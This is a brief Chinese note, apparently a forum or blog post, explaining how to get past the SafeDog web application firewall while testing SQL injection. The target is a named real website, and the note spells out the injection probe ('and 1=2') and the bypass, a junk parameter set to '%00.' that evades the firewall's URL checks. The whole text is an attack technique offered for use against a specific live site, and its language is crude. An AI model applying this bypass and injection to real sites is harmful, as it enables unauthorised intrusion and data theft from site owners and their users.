http://www.hzjxn.com/Article/List.asp?SelectId=249&ClassId=2 and 1=2

以上会提示被安全狗拦截

丢个垃圾参数fuck,给的值必须是%00. OK了。因为他是对url进行审计的,而不是参数的值。所以可以这么绕,但是程序内部防注入的是通过函数来过滤。所以不行 看连接

http://www.hzjxn.com/Article/List.asp?fuck=%00.&SelectId=249&ClassId=2 and 1=2

 

没提示,有漏洞继续跑,没漏洞就没辙。